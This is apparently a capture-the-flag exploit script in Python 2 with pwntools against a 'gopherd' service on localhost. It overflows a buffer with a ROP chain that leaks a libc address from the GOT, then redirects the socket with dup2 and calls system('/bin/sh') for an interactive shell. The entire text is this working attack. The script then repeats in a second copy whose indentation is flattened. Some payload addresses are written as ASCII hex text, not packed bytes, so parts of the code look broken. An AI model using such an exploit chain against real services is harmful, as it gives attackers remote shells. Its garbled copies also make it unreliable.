otms61/gopherd2.py

## gopherd2.py
from pwn import *
from pwnlib.tubes.remote import remote
from struct import pack, unpack
from time import sleep


def main():
    t = remote('localhost', 2233, timeout=1000)

    #  0x80487c0 <read@plt>:    jmp    DWORD PTR ds:0x804c010
    read_got = 0x804c010
    send_plt = 0x8048a20 # 08048a20 <send@plt>
    # 000db460 <__read>
    # 00040100 <__libc_system>
    # .data = 0x804c0c0

    # use data 0x804c7c0

    ret = 0x804877f
    popret = 0x8048796
    pop2ret = 0x8048d93
    pop3ret = 0x804926b
    pop4ret = 0x804a7dc
    leaveret = 0x8048a89

    p1 = ''
    p1 += 'a'*72
    p1 += '938d0408' # pop2ret  0x8048d93
    p1 += 'a'*8
    p1 += '08d00408' # 0x0804d008 hash list address
    p1 += '208a0408' #send(4, read_got, 4, 0) 0x8048a20
    p1 += 'dca70408' #pop4ret
    p1 += '04000000' #4
    p1 += '10c00408' #read_got
    p1 += '04000000' #4
    p1 += '00000000' #0
    p1 += 'c0870408' #read@plt
    p1 += 'dca70408' #pop4ret
    p1 += '04000000' #fd
    p1 += 'c0c70408' #.data
    p1 += '00040000' #size
    p1 += 'c0c70408' #.data
    p1 += '898a0408' #leave, ret;


    p1 += '\r\n' # end

    t.send(p1)
    sleep(1)
    read_addr = unpack('<I', t.recv(4))[0]
    libc_base = read_addr - 0x0db460
    system_addr = libc_base + 0x40100
    binsh_addr = libc_base + 0x1612c4
    dup2_addr = libc_base + 0xdbe20 # 000dbe20 <__dup2>:

    print "[*] read address: %s" % hex(read_addr)
    print "[*] system address: %s" % hex(system_addr)
    print "[*] binsh address: %s" % hex(binsh_addr)

    p2 = ''
    p2 += pack('<I', 0xdeadbeaf)     # .data
    p2 += pack('<I', dup2_addr) # dup2(4,0)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', 0)
    p2 += pack('<I', dup2_addr) # dup2(4,1)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', 1)
    p2 += pack('<I', dup2_addr) # dup2(4,2)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', 2)
    p2 += pack('<I', system_addr) #system('/bin/sh')
    p2 += pack('<I', 0xdeadbeaf)
    p2 += pack('<I', binsh_addr)
    t.send(p2+'\n')
    t.interactive()


    t.close()

if __name__ == '__main__':
    main()
	from pwn import *
	from pwnlib.tubes.remote import remote
	from struct import pack, unpack
	from time import sleep



	def main():
	t = remote('localhost', 2233, timeout=1000)

	# 0x80487c0 <read@plt>: jmp DWORD PTR ds:0x804c010
	read_got = 0x804c010
	send_plt = 0x8048a20 # 08048a20 <send@plt>
	# 000db460 <__read>
	# 00040100 <__libc_system>
	# .data = 0x804c0c0

	# use data 0x804c7c0

	ret = 0x804877f
	popret = 0x8048796
	pop2ret = 0x8048d93
	pop3ret = 0x804926b
	pop4ret = 0x804a7dc
	leaveret = 0x8048a89

	p1 = ''
	p1 += 'a'*72
	p1 += '938d0408' # pop2ret 0x8048d93
	p1 += 'a'*8
	p1 += '08d00408' # 0x0804d008 hash list address
	p1 += '208a0408' #send(4, read_got, 4, 0) 0x8048a20
	p1 += 'dca70408' #pop4ret
	p1 += '04000000' #4
	p1 += '10c00408' #read_got
	p1 += '04000000' #4
	p1 += '00000000' #0
	p1 += 'c0870408' #read@plt
	p1 += 'dca70408' #pop4ret
	p1 += '04000000' #fd
	p1 += 'c0c70408' #.data
	p1 += '00040000' #size
	p1 += 'c0c70408' #.data
	p1 += '898a0408' #leave, ret;


	p1 += '\r\n' # end

	t.send(p1)
	sleep(1)
	read_addr = unpack('<I', t.recv(4))[0]
	libc_base = read_addr - 0x0db460
	system_addr = libc_base + 0x40100
	binsh_addr = libc_base + 0x1612c4
	dup2_addr = libc_base + 0xdbe20 # 000dbe20 <__dup2>:

	print "[*] read address: %s" % hex(read_addr)
	print "[*] system address: %s" % hex(system_addr)
	print "[*] binsh address: %s" % hex(binsh_addr)

	p2 = ''
	p2 += pack('<I', 0xdeadbeaf) # .data
	p2 += pack('<I', dup2_addr) # dup2(4,0)
	p2 += pack('<I', pop2ret) # pop2ret
	p2 += pack('<I', 4)
	p2 += pack('<I', 0)
	p2 += pack('<I', dup2_addr) # dup2(4,1)
	p2 += pack('<I', pop2ret) # pop2ret
	p2 += pack('<I', 4)
	p2 += pack('<I', 1)
	p2 += pack('<I', dup2_addr) # dup2(4,2)
	p2 += pack('<I', pop2ret) # pop2ret
	p2 += pack('<I', 4)
	p2 += pack('<I', 2)
	p2 += pack('<I', system_addr) #system('/bin/sh')
	p2 += pack('<I', 0xdeadbeaf)
	p2 += pack('<I', binsh_addr)
	t.send(p2+'\n')
	t.interactive()


	t.close()

	if __name__ == '__main__':
	main()